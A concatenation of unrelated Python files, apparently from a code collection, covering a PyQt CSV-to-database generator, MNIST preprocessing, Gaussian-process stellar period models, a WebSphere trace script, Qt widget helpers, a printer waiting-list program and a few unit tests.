self.select_migration_seeder.setGeometry(QtCore.QRect(290, 150, 120, 23)) self.select_migration_seeder.setObjectName("btn_dbsm_migration_seeder") self.select_migration_seeder.addItem("") self.select_migration_seeder.addItem("") self.select_migration_seeder.addItem("") self.select_migration_seeder.setVisible(False) # display migration filepath for framework self.label_migration_file = QtWidgets.QLineEdit(self.centralwidget) self.label_migration_file.setGeometry(QtCore.QRect(410, 110, 221, 16)) self.label_migration_file.setObjectName("label_migration_file") self.label_migration_file.setVisible(False) # display seeder filepath for framework self.label_seeder_file = QtWidgets.QLineEdit(self.centralwidget) self.label_seeder_file.setGeometry(QtCore.QRect(410, 150, 221, 16)) self.label_seeder_file.setObjectName("label_seeder_file") self.label_seeder_file.setVisible(False) # save in for dbsm self.btn_save_dbsm = QtWidgets.QPushButton(self.centralwidget) self.btn_save_dbsm.setGeometry(QtCore.QRect(290, 110, 111, 23)) self.btn_save_dbsm.setObjectName("btn_save_dbsm") self.btn_save_dbsm.setVisible(False) self.btn_save_dbsm.clicked.connect(self.save_in) # label for save in self.label_save_in = QtWidgets.QLineEdit(self.centralwidget) self.label_save_in.setGeometry(QtCore.QRect(410, 110, 221, 16)) self.label_save_in.setObjectName("label_migration_file") self.label_save_in.setVisible(False) MainWindow.setCentralWidget(self.centralwidget) self.retranslateUi(MainWindow) QtCore.QMetaObject.connectSlotsByName(MainWindow) def retranslateUi(self, MainWindow): _translate = QtCore.QCoreApplication.translate MainWindow.setWindowTitle(_translate("MainWindow", "Csv To DB")) self.title_dbsm.setText(_translate("MainWindow", "DBSM")) self.title_framework.setText(_translate("MainWindow", "Framework")) self.btn_mysql.setText(_translate("MainWindow", "Mysql")) self.btn_laravel.setText(_translate("MainWindow", "Laravel")) self.send.setText(_translate("MainWindow", "Generate")) self.btn_select_csv.setText(_translate("MainWindow", "Select CSV")) self.btn_migration_file.setText(_translate("MainWindow", "migration file")) self.btn_seeder_file.setText(_translate("MainWindow", "seeder file")) self.select_migration_seeder.setItemText(0, _translate("MainWindow", "migration")) self.select_migration_seeder.setItemText(1, _translate("MainWindow", "seeder")) self.select_migration_seeder.setItemText(2, _translate("MainWindow", "migration + seeder")) self.label_migration_file.setText(_translate("MainWindow", "")) self.label_seeder_file.setText(_translate("MainWindow", "")) self.btn_save_dbsm.setText(_translate("MainWindow", "save in")) self.label_save_in.setText(_translate("MainWindow", "")) # ------------------------------- # method for btn # ------------------------------- def browse_file(self): """ open folder dialog menu :return: """ file = QtWidgets.QFileDialog.getOpenFileName(caption='Select CSV file', directory='D:\\', filter='*.csv') self.csv_filepath_display.setText(file[0]) def save_in(self): """ save in for dbsm :return: """ file = QtWidgets.QFileDialog.getExistingDirectory(caption='Select where to save the file', directory='./') self.label_save_in.setVisible(True) self.label_save_in.setText(file) def display_opt(self, dbsm: bool): """ display info for mysql\n mode: - dbsm - framework :return: """ if dbsm: self.select_migration_seeder.setVisible(True if self.btn_mysql.isChecked() else False) self.btn_save_dbsm.setVisible(True if self.btn_mysql.isChecked() else False) else: self.btn_seeder_file.setVisible(True if self.btn_laravel.isChecked() else False) self.btn_migration_file.setVisible(True if self.btn_laravel.isChecked() else False) def mig_seed_file(self, type: str): """ migration or seeder file :return: """ file = QtWidgets.QFileDialog.getOpenFileName(caption=f'Select {type} file', directory='D:\\', filter='*.php') if type == 'migration': self.label_migration_file.setVisible(True) self.label_migration_file.setText(file[0]) else: self.label_seeder_file.setVisible(True) self.label_seeder_file.setText(file[0]) def generate(self): """ generate file from the csv :return: """ print('yes') filename = re.findall(r'[\w-]+\.csv', self.csv_filepath_display.text()) print('yes2') filepath = re.sub(r'[\/\\][\w-]+\.csv', '', self.csv_filepath_display.text(), 0) print('yes3') for name in filename: filename = re.sub(r'\.csv', '', name) csv = Csv(filename=filename, filepath=filepath) # mysql if self.btn_mysql.isChecked(): if self.label_save_in.text(): save_in = self.label_save_in.text() if self.select_migration_seeder.currentText() == 'migration': Mysql.new_table(csv=csv, filename=filename, filepath=save_in) elif self.select_migration_seeder.currentText() == 'seeder': Mysql.new_seeder(csv=csv, filename=filename, filepath=save_in) elif self.select_migration_seeder.currentText() == 'migration + seeder': Mysql.new_table(csv=csv, filename=filename, filepath=save_in) Mysql.new_seeder(csv=csv, filename=filename, filepath=save_in) # laravel elif self.btn_laravel.isChecked(): if self.label_migration_file.text(): filename = re.findall(r'[\w-]+\.php', self.label_migration_file.text()) filepath = re.sub(r'[\/\\][\w-]+\.php', '', self.label_migration_file.text(), 0) for name in filename: filename = re.sub(r'\.php', '', name) Laravel.new_migration(csv=csv, filename=filename, filepath=filepath) if self.label_seeder_file.text(): filename = re.findall(r'[\w-]+\.php', self.label_seeder_file.text()) filepath = re.sub(r'[\/\\][\w-]+\.php', '', self.label_seeder_file.text(), 0) for name in filename: filename = re.sub(r'\.php', '', name) Laravel.new_seeder(csv=csv, filename=filename, filepath=filepath) if __name__ == "__main__": import sys app = QtWidgets.QApplication(sys.argv) MainWindow = QtWidgets.QMainWindow() ui = Ui_MainWindow() ui.setupUi(MainWindow) MainWindow.show() sys.exit(app.exec_()) import numpy as np import pandas as pd from sklearn.utils import shuffle from sklearn.model_selection import train_test_split from keras.utils.np_utils import to_categorical import seaborn as sns def common_preprocessing(df): df = df.values.reshape(-1, 28, 28, 1) return df def preprocess_data(train, train_val_prop = 0.25, rnd_seed = 1): # Shuffle train = shuffle(train, random_state = rnd_seed) # Split x, y y_train = train["label"] x_train = train.drop(labels = ["label"], axis = 1) del train # Reshape images (from vector to matrix) x_train = common_preprocessing(x_train) # sns.countplot(y_train) # Value to categorical variable y_train = to_categorical(y_train, num_classes=10) # Split train/val x_train, x_val, y_train, y_val = train_test_split( x_train, y_train, test_size = train_val_prop, random_state = rnd_seed) return x_train, y_train, x_val, y_valdioph/periodicity import celerite2 import celerite2.theano import emcee import george import numpy as np import pymc3 as pm import pymc3_ext as pmx from scipy.optimize import minimize from scipy.stats import norm from .core import TSeries __all__ = [ "GeorgeModeler", "CeleriteModeler", "TheanoModeler", "QuasiPeriodicGP", "BrownianGP", "HarmonicGP", "BrownianTheanoGP", "HarmonicTheanoGP", ] def _gaussian(mu, sd): """Simple 1D Gaussian function generator. Parameters ---------- mu: float Mean. sd: float Standard deviation. Returns ------- pdf: function 1D Gaussian PDF with given parameters. """ def pdf(x): z = (x - mu) / sd return np.exp(-z * z / 2.0) / np.sqrt(2.0 * np.pi) / sd return pdf def make_ppf(x, pdf): """Generate an empirical Percent Point Function (inverse CDF) for an arbitrary PDF. Parameters --------- x: array-like Points at which to evaluate the PDF. pdf: array-like PDF sampled at x. Returns ------- ppf: function Interpolates the inverse CDF. """ cdf = np.cumsum(pdf) cdf /= cdf[-1] def ppf(q): icdf = np.interp(q, cdf, x) return icdf return ppf def make_gaussian_prior( signal, p_min=None, periods=None, a=1.0, b=2.0, n=8, fundamental_height=0.8, fundamental_width=0.1, ): """Generates a weighted sum of Gaussian PDFs as a probability prior on the logarithm of the signal period. Based on [#]_ Parameters ---------- signal: TSeries or array-like Input (quasi-)periodic signal. p_min: float, optional Lower cutoff period to filter signal. periods: list, optional List of higher cutoff periods to filter signal. Only periods between `p_min` and half the baseline will be considered. a, b, n: float, optional If `periods` is not given, then the first `n` powers of `b` scaled by `a` will be used: ``periods = a * b ** np.arange(n)`` fundamental_height: float, optional Weight of the gaussian mixture on the fundamental peak. The double and half harmonics both are equally weighted ``(1 - fundamental_height) / 2``. Defaults to 0.8. fundamental_width: float, optional Width (standard deviation) of the gaussian PDFs in the prior. Defaults to 0.1. Returns ------- gaussian_prior: function prior on the log-period See Also -------- periodicity.utils.acf_harmonic_quality References ---------- .. [#] , , , , , "Inferring probabilistic stellar rotation periods using Gaussian processes," MNRAS, February 2018. """ if not isinstance(signal, TSeries): signal = TSeries(data=signal) if periods is None: periods = a * b ** np.arange(n) if p_min is None: p_min = max(np.min(periods) / 10, 3 * signal.median_dt) periods = np.array([p for p in periods if p_min < p < signal.baseline / 2]) ps, hs, qs = [], [], [] for p_max in periods: p, h, q = signal.acf_period_quality(p_min, p_max) ps.append(p) hs.append(h) qs.append(q) def gaussian_prior(log_p): tot = 0 fh = fundamental_height hh = (1 - fh) / 2 fw = fundamental_width for p, q in zip(ps, qs): q = max(q, 0) gaussian1 = _gaussian(np.log(p), fw) gaussian2 = _gaussian(np.log(p / 2), fw) gaussian3 = _gaussian(np.log(2 * p), fw) tot += q * ( fh * gaussian1(log_p) + hh * gaussian2(log_p) + hh * gaussian3(log_p) ) tot /= np.sum(qs) return tot return gaussian_prior class GeorgeModeler(object): def __init__( self, signal, err, init_period=None, period_prior=None, bounds=None, constraints=None, ): if not isinstance(signal, TSeries): signal = TSeries(data=signal) self.signal = signal self.err = err self.t = self.signal.time self.y = self.signal.values self.sigma = np.std(self.y) self.jitter = np.min(self.err) ** 2 self.mean = np.mean(self.y) if init_period is None: init_period = np.sqrt(signal.size) * signal.median_dt if period_prior is None: sd_p = 0.2 * np.log(signal.size) def period_prior(period): return norm.logpdf(np.log(period), np.log(init_period), sd_p) self.period_prior = period_prior self.bounds = bounds self.constraints = constraints self.gp = george.GP( self.kernel, solver=george.HODLRSolver, mean=self.mean, fit_mean=True, white_noise=np.log(self.jitter), fit_white_noise=True, ) self.basic_gp = george.GP( self.kernel, mean=self.mean, fit_mean=True, white_noise=np.log(self.jitter), fit_white_noise=True, ) self.gp.compute(self.t, yerr=self.err) self.basic_gp.compute(self.t, yerr=self.err) self.ndim = len(self.gp) def log_prior(self, theta): raise NotImplementedError("subclasses must implement this method") def set_params(self, theta, gp): gp.set_parameter_vector(theta) gp.compute(self.t, yerr=self.err) return gp def get_prediction(self, time, gp): mu, var = gp.predict(self.y, t=time, return_var=True) sd = np.sqrt(var) return mu, sd def get_kernel(self, tau, gp): return gp.kernel.get_value([[0]], gp.parse_samples(tau))[0] def nll(self, theta, gp): """Objective function based on the Negative Log-Likelihood.""" gp = self.set_params(theta, gp) ll = gp.log_likelihood(self.y, quiet=True) return -ll if np.isfinite(ll) else 1e25 def grad_nll(self, theta, gp): gp = self.set_params(theta, gp) grad = -gp.grad_log_likelihood(self.y, quiet=True) return grad def minimize(self, gp, grad=False, **kwargs): """Gradient-based optimization of the objective function within the unit hypercube.""" x0 = gp.get_parameter_vector() soln = minimize( self.nll, x0, jac=self.grad_nll if grad else None, args=(gp,), bounds=self.bounds, constraints=self.constraints, **kwargs, ) opt_gp = self.set_params(soln.x, gp) return soln, opt_gp def log_prob(self, theta, gp): """Posterior distribution over the hyperparameters.""" lp = self.log_prior(theta) if not np.isfinite(lp): return -np.inf gp = self.set_params(theta, gp) lp += gp.log_likelihood(self.y) return lp def mcmc(self, n_walkers=50, n_steps=1000, burn=0, random_seed=None): """Samples the posterior probability distribution with a Markov Chain Monte Carlo simulation. Parameters ---------- n_walkers: int, optional Number of walkers (the default is 50). n_steps: int, optional Number of steps taken by each walker (the default is 1000). burn: int, optional Number of burn-in samples to remove from the beginning of the simulation (the default is 0). use_prior: bool, optional Whether to start walkers by sampling from the prior distribution. The default is False, in which case a ball centered at the MLE hyperparameter vector is used. Returns ------- samples: ndarray[n_dim, n_walkers * (n_steps - burn)] Samples of the posterior hyperparameter distribution. """ rng = np.random.default_rng(random_seed) np.random.seed(random_seed) soln, opt_gp = self.minimize(self.gp) x0 = soln.x + 1e-3 * rng.standard_normal((n_walkers, self.ndim)) # TODO: multi-threading sampler = emcee.EnsembleSampler( n_walkers, self.ndim, self.log_prob, args=(self.gp,) ) sampler.run_mcmc(x0, n_steps, progress=True) samples = sampler.get_chain(discard=burn, flat=True) tau = sampler.get_autocorr_time(discard=burn, quiet=True) trace = samples.T self.sampler = sampler return trace, tau class QuasiPeriodicGP(GeorgeModeler): def __init__( self, signal, err, init_period=None, period_prior=None, bounds=None, constraints=None, ): kernel = george.kernels.ConstantKernel(np.log(np.var(signal))) kernel *= george.kernels.ExpSquaredKernel(10.0) kernel *= george.kernels.ExpSine2Kernel(4.5, 0.0) self.kernel = kernel super().__init__(signal, err, init_period, period_prior, bounds, constraints) if self.bounds is None: pmin = 2 * self.signal.median_dt pmax = 0.5 * self.signal.baseline self.bounds = [ (self.mean - self.sigma, self.mean + self.sigma), (np.log(self.jitter) - 5, np.log(self.jitter) + 5), (2 * np.log(self.sigma) - 10, 2 * np.log(self.sigma) + 10), (2 * np.log(pmin), 2 * np.log(10 * pmax)), (1.0, 20.0), (np.log(pmin), np.log(pmax)), ] if self.constraints is None: # guarantee tau > period self.constraints = {"type": "ineq", "fun": lambda x: 0.5 * x[3] - x[5]} def log_prior(self, theta): mean, log_jitter, log_sigma2, log_tau2, gamma, log_period = theta tau = np.exp(log_tau2 / 2) period = np.exp(log_period) lp = norm.logpdf(mean, self.mean, self.sigma) lp += norm.logpdf(log_jitter, np.log(self.jitter), 2.0) lp += norm.logpdf(log_sigma2, 2 * np.log(self.sigma), 4.0) lp += 1 / np.log(100) lp += np.log(np.logical_and(1 < tau / period, tau / period < 10)) lp += norm.logpdf(np.log(gamma), 1.5, 1.5) lp += self.period_prior(np.exp(log_period)) return lp class CeleriteModeler(object): def __init__(self, signal, err, init_period=None, period_ppf=None): if not isinstance(signal, TSeries): signal = TSeries(data=signal) self.signal = signal self.err = err self.t = self.signal.time self.y = self.signal.values self.sigma = np.std(self.y) self.jitter = np.min(self.err) ** 2 self.mean = np.mean(self.y) if init_period is None: init_period = np.sqrt(signal.size) * signal.median_dt if period_ppf is None: def period_ppf(u): sigma_period = 0.5 * np.log(signal.size) return np.exp(norm.ppf(u, np.log(init_period), sigma_period)) self.period_ppf = period_ppf init_params = self.prior_transform(np.full(self.ndim, 50.0)) init_params["period"] = init_period mean = init_params.pop("mean") jitter = init_params.pop("jitter") self.gp = celerite2.GaussianProcess(self.kernel(**init_params), mean=mean) self.gp.compute(self.t, diag=self.err ** 2 + jitter) def prior_transform(self, u): raise NotImplementedError("subclasses must implement this method") def set_params(self, params, gp): gp.mean = params.pop("mean") jitter = params.pop("jitter") gp.kernel = self.kernel(**params) gp.compute(self.t, diag=self.err ** 2 + jitter, quiet=True) return gp def get_psd(self, frequency, gp): return gp.kernel.get_psd(2 * np.pi * frequency) def get_prediction(self, time, gp): mu, var = gp.predict(self.y, t=time, return_var=True) sd = np.sqrt(var) return mu, sd def get_kernel(self, tau, gp): return gp.kernel.get_value(tau) def nll(self, u, gp): """Objective function based on the Negative Log-Likelihood.""" params = self.prior_transform(u) gp = self.set_params(params, gp) return -gp.log_likelihood(self.y) def minimize(self, gp, **kwargs): """Gradient-based optimization of the objective function within the unit hypercube.""" u0 = np.full(self.ndim, 50.0) bounds = [(0.01, 99.99) for x in u0] soln = minimize( self.nll, u0, method="L-BFGS-B", args=(gp,), bounds=bounds, **kwargs ) opt_params = self.prior_transform(soln.x) opt_gp = self.set_params(opt_params, gp) return soln, opt_gp def log_prob(self, u, gp): if any(u >= 99.99) or any(u <= 0.01): return -np.inf params = self.prior_transform(u) gp = self.set_params(params, gp) ll = gp.log_likelihood(self.y) return ll def mcmc( self, n_walkers=50, n_steps=1000, burn=0, use_prior=False, random_seed=None ): """Samples the posterior probability distribution with a Markov Chain Monte Carlo simulation. Parameters ---------- n_walkers: int, optional Number of walkers (the default is 50). n_steps: int, optional Number of steps taken by each walker (the default is 1000). burn: int, optional Number of burn-in samples to remove from the beginning of the simulation (the default is 0). use_prior: bool, optional Whether to start walkers by sampling from the prior distribution. The default is False, in which case a ball centered at the MLE hyperparameter vector is used. Returns ------- trace: dict Samples of the posterior hyperparameter distribution. tau: ndarray Estimated autocorrelation time of MCMC chain for each parameter. """ rng = np.random.default_rng(random_seed) np.random.seed(random_seed) if use_prior: u0 = rng.random((n_walkers, self.ndim)) else: soln, opt_gp = self.minimize(self.gp) u0 = soln.x + 1e-3 * rng.standard_normal((n_walkers, self.ndim)) sampler = emcee.EnsembleSampler( n_walkers, self.ndim, self.log_prob, args=(self.gp,) ) sampler.run_mcmc(u0, n_steps, progress=True) samples = sampler.get_chain(discard=burn, flat=True) tau = sampler.get_autocorr_time(discard=burn, quiet=True) trace = self.prior_transform(samples.T) self.sampler = sampler return trace, tau class BrownianTerm(celerite2.terms.TermSum): def __init__(self, sigma, tau, period, mix): Q = 0.01 sigma_1 = sigma * np.sqrt(mix) f = np.sqrt(1 - 4 * Q ** 2) w0 = 2 * Q / (tau * (1 - f)) S0 = (1 - mix) * sigma ** 2 / (0.5 * w0 * Q * (1 + 1 / f)) super().__init__( celerite2.terms.SHOTerm(sigma=sigma_1, tau=tau, rho=period), celerite2.terms.SHOTerm(S0=S0, w0=w0, Q=Q), ) class BrownianGP(CeleriteModeler): def __init__(self, signal, err, init_period=None, period_ppf=None): self.ndim = 6 self.kernel = BrownianTerm super().__init__(signal, err, init_period, period_ppf) def prior_transform(self, u): u = u / 100 period = self.period_ppf(u[3]) params = { "mean": norm.ppf(u[0], self.mean, self.sigma), "sigma": np.exp(norm.ppf(u[1], np.log(self.sigma), 2.0)), "tau": period * 10 ** u[2], "period": period, "mix": u[4] * 0.5, "jitter": np.exp(norm.ppf(u[5], np.log(self.jitter), 2.0)), } return params class HarmonicGP(CeleriteModeler): def __init__(self, signal, err, init_period=None, period_ppf=None): self.ndim = 7 self.kernel = celerite2.terms.RotationTerm super().__init__(signal, err, init_period, period_ppf) def prior_transform(self, u): u = u / 100 period = self.period_ppf(u[2]) params = { "mean": norm.ppf(u[0], self.mean, self.sigma), "sigma": np.exp(norm.ppf(u[1], np.log(self.sigma), 2.0)), "period": period, "Q0": np.exp(norm.ppf(u[3], 1.0, 5.0)), "dQ": np.exp(norm.ppf(u[4], 2.0, 5.0)), "f": u[5], "jitter": np.exp(norm.ppf(u[6], np.log(self.jitter), 2.0)), } return params class TheanoModeler(object): def __init__(self, signal, err, init_period=None): if not isinstance(signal, TSeries): signal = TSeries(data=signal) self.signal = signal self.err = err self.t = self.signal.time self.y = self.signal.values self.sigma = np.std(self.y) self.jitter = np.min(self.err) ** 2 self.mean = np.mean(self.y) if init_period is None: init_period = np.sqrt(signal.size) * signal.median_dt self.sigma_period = 0.5 * np.log(signal.size) self.init_period = init_period def mcmc(self, n_walkers=1, n_steps=2000, burn=1000, cores=1): with self.model: trace = pmx.sample( tune=burn, draws=n_steps - burn, cores=cores, chains=n_walkers, random_seed=42, ) self.period_samples = trace["period"] return trace class BrownianTheanoGP(TheanoModeler): def __init__(self, signal, err, init_period=None, predict_at=None, psd_at=None): super().__init__(signal, err, init_period) with pm.Model() as model: # The mean flux of the time series mean = pm.Normal("mean", mu=self.mean, sd=self.sigma) # A jitter term describing excess white noise log_jitter = pm.Normal("log_jitter", mu=np.log(self.jitter), sd=2.0) # The parameters of the BrownianTerm kernel sigma = pm.Lognormal("sigma", mu=np.log(self.sigma), sd=2.0) period = pm.Lognormal( "period", mu=np.log(self.init_period), sd=self.sigma_period ) log_tau = pm.Uniform("log_tau", lower=0.0, upper=np.log(10)) tau = pm.math.exp(log_tau) * period mix = pm.Uniform("mix", lower=0.0, upper=0.5) Q = 0.01 sigma_1 = sigma * pm.math.sqrt(mix) f = pm.math.sqrt(1 - 4 * Q ** 2) w0 = 2 * Q / (tau * (1 - f)) S0 = (1 - mix) * sigma ** 2 / (0.5 * w0 * Q * (1 + 1 / f)) # Set up the Gaussian Process model kernel1 = celerite2.theano.terms.SHOTerm(sigma=sigma_1, tau=tau, rho=period) kernel2 = celerite2.theano.terms.SHOTerm(S0=S0, w0=w0, Q=Q) kernel = kernel1 + kernel2 gp = celerite2.theano.GaussianProcess(kernel, mean=mean) gp.compute(self.t, diag=self.err ** 2 + pm.math.exp(log_jitter), quiet=True) gp.marginal("obs", observed=self.y) if predict_at is not None: pm.Deterministic("pred", gp.predict(self.y, predict_at)) if psd_at is not None: pm.Deterministic("psd", kernel.get_psd(2 * np.pi * psd_at)) self.model = model class HarmonicTheanoGP(TheanoModeler): def __init__(self, signal, err, init_period=None, predict_at=None, psd_at=None): super().__init__(signal, err, init_period) with pm.Model() as model: # The mean flux of the time series mean = pm.Normal("mean", mu=self.mean, sd=self.sigma) # A jitter term describing excess white noise log_jitter = pm.Normal("log_jitter", mu=np.log(self.jitter), sd=2.0) # The parameters of the RotationTerm kernel sigma = pm.Lognormal("sigma", mu=np.log(self.sigma), sd=2.0) period = pm.Lognormal( "period", mu=np.log(self.init_period), sd=self.sigma_period ) Q0 = pm.Lognormal("Q0", mu=1.0, sd=5.0) dQ = pm.Lognormal("dQ", mu=2.0, sd=5.0) f = pm.Uniform("f", lower=0.0, upper=1.0) # Set up the Gaussian Process model kernel = celerite2.theano.terms.RotationTerm( sigma=sigma, period=period, Q0=Q0, dQ=dQ, f=f, ) gp = celerite2.theano.GaussianProcess(kernel, mean=mean) gp.compute(self.t, diag=self.err ** 2 + pm.math.exp(log_jitter), quiet=True) gp.marginal("obs", observed=self.y) if predict_at is not None: pm.Deterministic("pred", gp.predict(self.y, predict_at)) if psd_at is not None: pm.Deterministic("psd", kernel.get_psd(2 * np.pi * psd_at)) self.model = model lib/webports/tests/test_installed_package.py # Copyright 2014 The Native Client Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. from mock import call, patch, Mock import common from webports import installed_package test_info = '''\ NAME=foo VERSION=bar BUILD_ARCH=arm BUILD_CONFIG=debug BUILD_TOOLCHAIN=glibc BUILD_SDK_VERSION=123 BUILD_NACLPORTS_REVISION=98765 ''' def create_mock_installed_package(): file_mock = common.mock_file_object(test_info) with patch('__builtin__.open', Mock(return_value=file_mock), create=True): return installed_package.InstalledPackage('dummy_file') class TestInstalledPackage(common.NaclportsTest): @patch('webports.util.log', Mock()) @patch('webports.installed_package.remove_file') @patch('webports.installed_package.installed_package_iterator', Mock(return_value=[])) @patch('os.path.lexists', Mock(return_value=True)) @patch('os.path.exists', Mock(return_value=True)) def test_uninstall(self, remove_patch): # pylint: disable=no-self-use pkg = create_mock_installed_package() pkg.files = Mock(return_value=['f1', 'f2']) pkg.uninstall() # Assert that exactly 4 files we removed using remove_file calls = [call('/package/install/path/var/lib/npkg/foo.info'), call('/package/install/path/f1'), call('/package/install/path/f2'), call('/package/install/path/var/lib/npkg/foo.list')] remove_patch.assert_has_calls(calls) 10-100 ''' Enable / disable trace settings for all cluster members Cluster name is passed as first parameter to the script Tracestring is passed as second parameter if Tracestring is empty -> disable trace author: mail: license: Apache 2.0 ''' import sys if len(sys.argv) == 0: print(''' \tScript needs at least one parameter: Clustername \n\tWhen a second parameter is used, it is interpreted as trace string \n\n\tExample: \twsadmin.sh -lang jython -f clusterTrace.py InfraCluster "*=info:com.ibm.lconn.news.*=all:com.ibm.lconn.core.services.*=all:com.ibm.lconn.hpnews.*=all" ''') sys.exit() elif len(sys.argv) == 1: type = 'disabled' cluster_name=sys.argv[0] else: cluster_name=sys.argv[0] traces=sys.argv[1] type = 'enabled' if type == 'enabled': trace_string='' for trace in traces.split(':'): if trace_string=='': trace_string=trace + '=' + type else: trace_string=trace_string + ':' + trace + '=' + type else: trace_string='*=info=enabled' cluster_id = AdminConfig.getid("/ServerCluster:"+cluster_name+"/") if not cluster_id: raise "Cluster %s does not exist!" % cluster_name member_ids = AdminConfig.showAttribute(cluster_id, "members") member_ids = member_ids[1:-1] for member_id in member_ids.split(): member_name=AdminConfig.showAttribute(member_id, "memberName") node_name=AdminConfig.showAttribute(member_id, "nodeName") # Get TraceServer ID ts=AdminControl.completeObjectName('type=TraceService,process='+member_name+',*') # Set trace settings try: AdminControl.setAttribute(ts, 'traceSpecification', trace_string) print("Successfully " + type + " trace on " + node_name + '/' + member_name) except: print("Error changing trace on " + node_name + '/' + member_name) from pyqtgraph.Qt.QtCore import Qt from pyqtgraph.Qt.QtWidgets import * def create_button(text: list): """ Creates QPushButton objects inside a QGroupBox object. The default color of button will be white with black background. :param text: type:list - list of text for all buttons :return: group_box: QGroupBox object - add this to the widget :return: buttons: list of QPushButton objects - use this to perform tasks on the buttons """ group_box = QGroupBox() num_buttons = len(text) buttons = [] for i in range(num_buttons): button = QPushButton(text[i]) button.setCheckable(True) buttons.append(button) group_box.setStyleSheet("color: black") hbox = QHBoxLayout() for button in buttons: hbox.addWidget(button) group_box.setLayout(hbox) return group_box, buttons def create_radio(text: list, radio_group): """ Creates QRadioButton objects inside a QGroupBox object. The default color of button background will be white. :param text: type:list - list of text for all buttons :param radio_group: QButtonGroup to add these buttons to :return: group_box: QGroupBox object - add this to the widget :return: buttons: list of QRadioButton object - use this to perform tasks on the buttons """ group_box = QGroupBox() num_buttons = len(text) radios = [] for i in range(num_buttons): radio = QRadioButton(text[i]) # this is so that the button is properly visible in black background radio.setStyleSheet("background-color: white") radio_group.addButton(radio) radios.append(radio) group_box.setStyleSheet("color: black") hbox = QHBoxLayout() for radio in radios: hbox.addWidget(radio) group_box.setLayout(hbox) return group_box, radios def create_slider(text, min_val, max_val, tick_spacing): """ Creates a QSlider object inside a QGroupBox object, along with a value label on the right The slider orientation will be horizontal. :param text: text to display above the slider :param min_val: lowest value of the slider :param max_val: highest value of the slider :param tick_spacing: interval between two ticks on the slider :return: group_box: QGroupBox object - add this to the widget - see example :return: slider: QSlider object - use this to perform tasks on the button :return: value_label: displays value of slider, update this when value is changed """ group_box = QGroupBox(text) slider = QSlider(Qt.Orientation.Horizontal) slider.setMinimum(min_val) slider.setMaximum(max_val) slider.setTickPosition(QSlider.TickPosition.TicksBothSides) slider.setTickInterval(tick_spacing) value_label = QLabel(str(slider.value())) group_box.setStyleSheet("color: white") vbox = QVBoxLayout() vbox.addWidget(slider) vbox.addWidget(value_label) group_box.setLayout(vbox) return group_box, slider, value_label Print_prior.py # Imports # Global variables printers = [] EOL = "\n" # Class class Printer: """_summary_ Class printers innehåller info som kommer vissas under printrarna, T.ex namn på printern, den som printar, status och tid. """ def __init__(self, name, time="") -> None: """_summary_ False = Printern är ledig True = Printern används self.name = printerns namn self.maker = Den som printars namn """ self.name = name self.time = time self.status = False self.maker = "" def name(self): return self.name def start(self): return self.time def check_status(self): """_summary_ Statusen visas när man öppnar programet och berättar vilken printer som är ledig/upptagen Om printern används ser man vem som printar och hur lång tid det kommer ta self.name anges av indexet man väljer i pick_printer self.time/maker anges av användaren i new_print """ status = "" status = "is printing" if self.status else "is free" print(f"{self.name} {status}\nPrinting:{self.maker}\nTime:{self.time}") def new_print(self): """_summary_ Funktionen lägger till namn, tid och ändrar stausen på printern till upptagen Statusen ändras genom att ändra från False till True Användaren identifieras plus man anger hur länge man förväntas använda printern. Self.name anges i pick_printer innan denna funktion därför vet programet vart den ska lägga till informationen. """ print("") self.status = True print(f"Adding new print to {self.name}") self.maker = input("Who is printing: ") self.time = input("Enter printing time: ") next_in_waiting() print("Your name is automatically moved from the waitinglist") get_printers() def done_printing(self): """ Self.name anges i used_printer, functionen tar bort maker och time från skrivarn samt ändrar statusen. self.maker = "" Tar bort värdet som tidigare stod där. """ print() print(f"{self.name} is now free to use") self.maker = "" self.time = "" self.status = False print() # Functions def options(): print("(1) See waitinglist") print("(2) Add name to waitinglist") print("(3) Chose printer to use") print("(4) Done printing") print("(#) Exit the program.") def view(): """_summary_ Readline läser upp listan rad för rad Count gör att namnen numreras Ex. 1. Niclas 2. Emy 3. Anna """ lines = [] with open('waitinglist.txt') as f: lines = f.readlines() count = 0 for line in lines: count += 1 print(f'{count}: {line}') def add_to_list(): with open("waitinglist.txt", "a", encoding="utf-8") as waiting_list: name = input("Enter name:") waiting_list.write(name+"\n") get_printers() def pick_printer(): """ Printrarna får ett index för att kunna identifieras vid val """ print() print("Choose a printer:") print("Pick the index you want to use.") for i, printer in enumerate(printers): print(f"{i}, {printer.name}") pick = input(">>> ") return printers[int(pick)] def used_printer(): """ Samma function som def pick_printer utom texten som printas Detta index används för att identifiera vilken printer man ska ta bort en print ifrån. """ print() print("Choose used printer:") print("Pick the index you have used.") for i, printer in enumerate(printers): print(f"{i}, {printer.name}") pick = input(">>> ") return printers[int(pick)] def menu(): """ En def kallas på genom if-satsen av ett input som är lika med ett choice. Choice definerars av inputet 1-4 eller #, "#" avslutar programet. Vid fel input loppas menyn tills ett korrekt input anges. Genom att sätta menyn i en loop slipper man kalla på menu efter varje def. """ choice = "" while choice != "#": print("""----Options----""") options() choice = input(">>> ") if choice == "1": view() elif choice == "2": add_to_list() elif choice == "3": printer = pick_printer() printer.new_print() elif choice == "4": printer = used_printer() printer.done_printing() elif choice == "#": # Avslutar loppen och programet print("Goodbye!") else: # Felaktigt input gör att menyn loppas print("Incorrect input") def next_in_waiting(): """ I väntelistan numreras alla namn, functionen plockar bort index 1 varje gång någon skriver in ett namn på en av printrarna. Nr 1 i väntelistan skriver in sitt namn på en printer och tas samtidigt bort från väntelistan. För att det ska fungera måste folk respektera ordningen på väntelistan. """ waiters = [] with open("waitinglist.txt", "r", encoding="utf-8") as f: waiters = f.readlines() next_in_line = waiters.pop(0) with open("waitinglist.txt", "w", encoding="utf-8") as f: for line in waiters: f.write(line) def get_printers(): """_summary_ Visar vilka printers som är lediga Free/ Funktionen check_status printas efter printerns namn. """ print() print("----Printers----") for printer in printers: printer.check_status() print() def main(): #global printers nemy = Printer("Nemy") tomda = Printer("Tomda") printers.append(nemy) printers.append(tomda) print("Loading Printers...") print("Following printers are online:") for printer in printers: print(printer.name) get_printers() menu() print() if __name__ == "__main__": main()'''Test send_log_message''' # pylint: disable=protected-access # pylint: disable=wrong-import-position # pylint: disable=redefined-outer-name from tests.conftest import * #imports testing boilerplate from requests import exceptions from moto import mock_ssm # begin testing lambda function import functions.send_log_message.lambda_function as lambda_function MESSAGE = "TEST" SUMO_SSM_NAME = "/socless/integration_name/message_url" @mock_ssm def test_handle_state(): #setup param for lambda function client = boto3.client('ssm') client.put_parameter(Name=SUMO_SSM_NAME, 